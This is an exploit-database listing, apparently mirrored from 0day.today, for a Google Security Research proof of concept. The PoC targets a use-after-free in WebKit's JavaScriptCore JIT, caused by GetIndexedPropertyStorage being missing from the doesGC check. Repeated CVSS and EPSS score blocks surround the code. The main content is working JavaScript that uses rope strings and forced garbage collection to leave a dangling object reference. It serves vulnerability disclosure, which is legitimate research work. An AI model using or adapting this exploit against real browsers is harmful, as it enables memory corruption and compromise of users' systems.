Lucene search

K
zdtGoogle Security Research1337DAY-ID-31982
HistoryJan 17, 2019 - 12:00 a.m.

WebKit JSC JIT - GetIndexedPropertyStorage Use-After-Free Exploit

2019-01-1700:00:00
Google Security Research
0day.today
19

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.892 High

EPSS

Percentile

98.5%

/*
The doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it's missing GetIndexedPropertyStorage that can cause a garbage collection via rope strings. As a result, it can lead to UaF.

PoC:
*/

function gc() {
    for (let i = 0; i < 10; i++) {
        new ArrayBuffer(1024 * 1024 * 10);
    }
}

function opt(arr) {
    let r = /a/;
    let o = {};

    arr[0].charAt(0);
    arr[1].charAt(0);
    arr[2].charAt(0);
    arr[3].charAt(0);
    arr[4].charAt(0);
    arr[5].charAt(0);
    arr[6].charAt(0);
    arr[7].charAt(0);
    arr[8].charAt(0);
    arr[8].charAt(0);
    arr[9].charAt(0);

    o.x = 'a'.match(r);

    return o;
}

function main() {
    for (let i = 0; i < 10000; i++) {
        opt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]);
    }

    let a = 'a'.repeat(1024 * 1024 * 2);
    let b = 'a'.repeat(1024 * 1024 * 2);

    let arr = [];
    for (let i = 0; i < 10; i++) {
        arr[i] = a + b;
    }

    gc();

    let o = opt(arr);

    gc();

    let tmp = [1234];

    print(o.x);  // 1234
}

main();

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.892 High

EPSS

Percentile

98.5%

Related for 1337DAY-ID-31982